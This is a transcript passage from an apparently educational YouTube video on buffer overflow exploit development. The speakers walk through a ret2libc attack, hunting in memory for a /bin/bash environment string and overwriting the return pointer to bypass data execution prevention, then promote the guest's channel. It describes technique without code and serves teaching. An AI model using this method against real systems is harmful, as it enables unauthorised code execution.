the problem now is I need to find that environment variable which can be really really tricky I'm going to look around a little bit so see how um ln missing file up around we're getting weird things getting sent to us that's because we're sneaking around in memory I'm typing different addresses trying to find the string bin bash so sometimes we get a weird message because we are passing a string it's a system that it doesn't understand it's like what is that. So if everyone watching Stephen and I have spent quite a bit of time now trying to manually find the part of memory so Stephen you can explain it better than I but you're missing a piece of software that would allow you to find it and then when we try to run bash it wasn't allowing us to do it right? yeah for sure unfortunately there's this little program I wrote it doesn't do anything fancy but it basically if you create an environment variable it will tell you the address as to where that environment variable will be located so the first thing we saw was when the process crashes we saw this shell equals bin bash that was for some reason there mapped into the environment so when I read it the debugger as you saw we got a shell and it worked it just didn't follow the fork but we got a shell perfect awesome wanted to get it working outside the debugger real quick so I was like maybe I can find this / bin /bash outside the debugger so we started looking at these environment variables all around here and by messing around with the memory address we were able to find out exactly where we were we printed out true color we printed out session manager and we should have been right here and we were able to get to some stuff behind that address but for whatever reason it wasn't actually mapping that specific shell environment variable into memory at that spot even though we found the right address and we don't know if that's maybe a protection or for some other reason it's not there to get around this you typically can simply create an environment variable yourself and then find the address of that variable and pass it as an argument and this was just one of the techniques that we were looking at called Ret2libc which you overwrite the return pointer with the address of of the function that's loaded into memory and you can pass any argument you want to that function and you get around data execution prevention because the code you're executing is really in the code segment we're searching through memory here we just couldn't help ourselves but to look around a bit more we were able to find the equals bin bash environment variable and for whatever reason when we go forward one more byte to 35 which should actually be /ben bash it's not popping a shell we go forward a couple more bytes like 37 you can see in bash but for whatever reason it's not popping one and it probably has to do with like the permissions not being set properly or so other protection might be running on this box and I'm not compensating for but we actually had it working perfectly right here and the debugger it worked outside of the bugger it's not so that leads me to believe that there is another like depth component preventing this from being possible but a lot of times this works perfectly. So Stephen the question is always how do I learn more you have a bunch of the stuff on your channel right and a whole bunch of of other things. Yeah absolutely so on my channel I tend to weave in and out of exploit development topics and then we'll go to Cloud hacking and then we'll go to crypto and just kind of all over the place because I think it's really fun to have guests on to talk about different areas where they're an expert when I typically tend to do it like recently I went through and did some kernel debugging and reverse engineered different exploit mitigations so that we could understand how these mitigations work at a very low level so I tend to be in the more advanced spaces but if there's a topic you'd love to see I'm happy to do it on that channel or also here with David of course but yeah my off by One Security Channel on YouTube I try as many Fridays as possible at 11 A.M Pacific time. So if everyone watching please go and show your love go and subscribe to Stephen's Channel Stephen thanks so much for sharing your knowledge I know you've been in this game a long time and you have a crazy amount of knowledge so thanks for you know making it freely available on YouTube really appreciate it [Music]

Info

Channel: David Bombal

Views: 56,668

Rating: undefined out of 5

Keywords: buffer, buffer overflow, buffer overflow attack, hacking, cracking, attacks, exploit, buffer exploit, buffer underflow, buffer overrun, computer security, Data Buffer, Exploit, exploit development, windows, linux, exploits, zero day, ubuntu, kali, kali linux, windows 11, windows 10, cyber, cybersecurity, hack, hacker, malware, infosec, information security, cyber security, ethical hacking, real world hack, hacking course, cybersecurity course, oscp, buffer overflow exploit, 0day

Id: c2BvS2VqDWg

Channel Id: undefined

Length: 55min 39sec (3339 seconds)

Published: Sun Aug 13 2023